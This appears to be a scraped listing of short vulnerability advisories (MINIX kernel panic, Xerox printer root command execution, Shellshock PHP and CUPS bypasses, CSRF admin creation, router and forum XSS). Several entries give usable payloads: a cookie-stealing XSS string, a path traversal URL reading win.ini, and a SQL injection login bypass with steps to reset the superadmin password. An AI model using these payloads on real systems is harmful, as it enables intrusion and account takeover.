MINIX 3.3.0 is prone to local kernel panic due to malformed program headers in an ELF executable. Attached three PoCs that panicked the OS, and their modified fields.
Login to system and upload any of your image. When uploading the image, the attacker needs to enter the XSS payload to 'Title' or 'Description' inputs. All visitors and logged users will be affected by this vulnerability.
This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary commands under root priviages.
This exploit allows an attacker to bypass the disable_functions directive in PHP 5.x and execute arbitrary commands on the vulnerable system. The exploit works by exploiting the CVE-2014-6271 vulnerability in Bash, which allows an attacker to set environment variables with specially crafted values before calling the PHP mail() function. The exploit then reads the output of the command from a temporary file and returns it to the attacker.
The worst is at the topic page, Submit Comment: Payload: [url=[img]onmouseover=alert(document.cookie);//://hackersoul.com/image.jpg#"aaaaaa[/img]]evi1m0#knownsec[/url] You see an alert.
This exploit allows an attacker to add an admin account to the Who's Who Script by exploiting the CSRF vulnerability present in the ayarsave.php, uyesave.php, slaytadd.php, and slaytsave.php files. The attacker can craft a malicious HTML page that contains a form with the username and password fields and submit it to the vulnerable file. The form will be automatically submitted without the user's knowledge, and the attacker will be able to add an admin account to the Who's Who Script.
A stored XSS vulnerability exists in ZTE Modem, where the variable aerviceName can be set to a malicious payload <script>alert(0)</script> which can be used to execute arbitrary JavaScript code in the context of the user's browser.
The malicious user sends a malformed request that generates the file access up directories as follows: http://target_ip:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini or else http://target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../../../windows/win.ini And the application answers; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMC=1 MAPIX=1 MAPIXVER=1.0.0.1 OLEMessaging=1
This module exploits a post-auth code injection in specially crafted environment variables in Bash, specifically targeting CUPS filters through the PRINTER_INFO and PRINTER_LOCATION variables by default.
Maarch GEC <= 1.4 and Maarch Letterbox <= suffer from multiple sql injection vulnerabilities. The worst is at the login page, index.php : login : superadmin' OR user_id='easy pass : whatyouwant You see an sql error, but reload the web page, you are logged in. To change superadmin pass: Go to Menu -> Mon Profile Type your news password twice, an email etc, and click on save. New Sql error (history table, so we don't care), but password is changed. Clear your cookies, return to application url, enter your new fresh password, it's done.
Services By CQR